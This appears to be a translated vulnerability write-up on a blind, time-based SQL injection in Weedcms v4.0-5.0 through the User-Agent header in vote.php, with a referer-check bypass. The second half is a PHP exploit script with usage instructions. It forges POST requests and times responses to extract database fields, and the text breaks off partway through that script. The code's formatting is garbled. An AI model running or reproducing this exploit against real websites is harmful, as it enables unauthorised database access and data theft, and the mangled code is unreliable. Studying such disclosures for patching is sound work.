Blind injection vulnerability and repair in Weedcms v4.0-5.0

Blind injection vulnerability in Weedcms v4.0 sp1 to the latest 5.0 Lunar New Year USER_AGENT

Program Description: Weedcms is based on the PHP + MYSQL architecture. The innovative content management mode allows you to define the content model after creating a channel, which can be controlled at the backend, making it very convenient.

The template engine uses a mature and stable Smarty engine to easily create a template interface. The front-end and back-end adopt DIV + CSS, which is slightly faster than the traditional one.

JS uses the internationally popular Jquery framework, as well as the Jquery-based XHEditor visual editor.

Supports Path Optimization Based on Apache and IIS to optimize your website for search engines.

Single-page function: make a similar introduction about us and the company. You only need to add data, and you can control access permissions.

The backend supports permission allocation to reduce the workload of administrators. You can customize menu navigation.

Advertisement: HTML customization is supported and can be sent to the page you want to display. Supports unlimited content classification and can define your own content in detail.

A member group interface is created to facilitate resource allocation Control. Monitors online website staff trends in real time. Background management operations can be recorded in logs one by one. Multi-language package switching is supported.

Cause of the vulnerability: vote. php USER_AGENT is directly inserted into the database, which is not filtered out. This causes Insert-type SQL injection. Because there is no error message, you can only perform blind injection.

Vulnerability Analysis: Let's look at the vote. php code:

We can see that this function does not filter the incoming data. It only generates simple SQL statements and finally calls query () for execution.

First, the program obtains the action variable through GET, if action = OK. Then, the system processes the vote and calls the check_request () function to verify the request. Let's follow up on this function.

Find "maid/function. php" line 390th.

We can see that only REFERER is matched with a simple regular expression, and the HOST is compared. we can bypass this verification by forging a REFERER request.

Then the program obtains the vote_id variable. We can pass a non-existent ID to it to prevent Program Logic interruption in different target environments, then we can see that the $ _ SERVER [HTTP_USER_AGENT] is directly obtained when the voting data is inserted, and the $ _ SERVEFR variable is not protected by magic_quotes_gpc, therefore, this vulnerability is universally usable and can be used to kill it. Finally, the $ db-> insert () function is used to insert data to the database. Let's take a look at this function to see if there is any filtering.

Find: includes/class_db.php row 20th

We can see that this function does not filter the incoming data. It only generates simple SQL statements and finally calls query () for execution.

Vulnerability exploitation: use format: php yecao. php 127.0.0.1 80] /" 2 ", four parameters: the target host port program path (beginning with/) latency

Code:

 

<? Php $ Port = 80; If (trim ($ argv [1]) = "" | trim ($ argv [2]) = "" | trim ($ argv [3]) = "" | trim ($ argv [4]) = ""){ Echo "use: www.exp.com 80"/web/"3 target host port program path (ending with/) Delay Note: To know the table prefix, the default value is w _, for MYSQL 5.0 or later versions, you can use the database name to obtain the table prefix "; Exit (); } $ Tlb_tag = "w _"; // defines the table prefix. $ Host = trim ($ argv [1]); $ Port = trim ($ argv [2]); $ Path = trim ($ argv [3]); $ Tout = trim ($ argv [4]); $ Fullpath = $ path. "vote. php? Action = OK "; $ Postdata = "vote_id = 99999999999 "; Function getmicrotime (){ List ($ usec, $ sec) = explode ("", microtime ()); Return (float) $ usec + (float) $ sec ); } Function DoGet ($ header = "", $ data = ""){ Global $ host, $ port, $ fullpath; $ Fp = fsockopen ($ host, $ port, $ errno, $ errstr, 30 ); $ Suc = false; $ Line = ""; If (! $ Fp ){ Echo "$ errstr ($ errno) <br/> "; } Else { $ Out = "POST $ fullpath HTTP/1.1 "; $ Out. = "Content-Type: application/x-www-form-urlencoded "; $ Out. = "Host: $ host "; $ Out. = "Referer:Http: // $ host/vote. php"; If ($ header! = ""){ $ Out. = $ header .""; } If ($ data! = ""){ $ Out. = "Content-Length:". strlen ($ data ).""; } $ Out. = "Connection: Close "; $ Out. = $ data; Fwrite ($ fp, $ out ); // Echo ""; While (! Feof ($ fp )){ $ Line = fgets ($ fp, 128 ); // Echo $ line; If (strpos ($ line, "Date :")! = False ){ $ Suc = true; } } // Echo ""; Fclose ($ fp ); If (! $ Suc ){ Return false; } Return true; } } Function GetLen ($ ColName, $ SQL ){ Global $ tout, $ tlb_tag, $ postdata; For ($ I = 1; $ I <= 50; $ I ++ ){ Eval ($ SQL ); Echo "Verification: $ ColName Field Length $ I ..."; $ Starttime = getmicrotime (); $ Rs = DoGet ($ header, $ postdata ); $ Endtime = getmicrotime (); // Echo "endtime: $ endtime-starttime: $ starttime =". ($ endtime-$ starttime). "timeout = $ tout "; If ($ endtime-$ starttime >=$ tout ){ Return $ I; } } Return false; } Function GetTxt ($ ColName, $ ColLen, $ SQL ){ $ Text = ""; For ($ I = 1; $ I <= $ ColLen; $ I ++ ){ $ Chr = GetChr ($ ColName, $ I, $ SQL ); // Echo "obtained: $ ColName field number:". $ I ."